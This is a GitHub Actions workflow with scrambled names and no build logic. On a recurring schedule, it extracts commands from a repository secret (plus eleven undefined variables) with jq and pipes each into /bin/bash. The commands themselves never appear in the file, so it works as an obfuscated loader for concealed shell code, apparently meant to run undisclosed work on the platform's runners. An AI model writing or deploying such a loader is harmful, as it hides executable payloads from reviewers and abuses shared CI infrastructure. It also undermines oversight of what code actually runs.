name: leidate7890

on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: leidate7890
        env:
          nq2: ${{ secrets.nq2 }}
        run: |
          echo $nq2 | jq -r .aurw0 | /bin/bash
          echo $qbw60220 | jq -r .akbc07 | /bin/bash
          echo $qmrr12 | jq -r .eyyj9 | /bin/bash
          echo $cqtjw76 | jq -r .pnt8 | /bin/bash
          echo $pdxcb942 | jq -r .zei49 | /bin/bash
          echo $jd9669 | jq -r .zpa3 | /bin/bash
          echo $jf2 | jq -r .a173 | /bin/bash
          echo $wrm292 | jq -r .igyv4 | /bin/bash
          echo $z44973 | jq -r .wgy0 | /bin/bash
          echo $s7 | jq -r .koh59 | /bin/bash
          echo $m548 | jq -r .pud5366 | /bin/bash
          echo $toptm671 | jq -r .ch65402 | /bin/bash

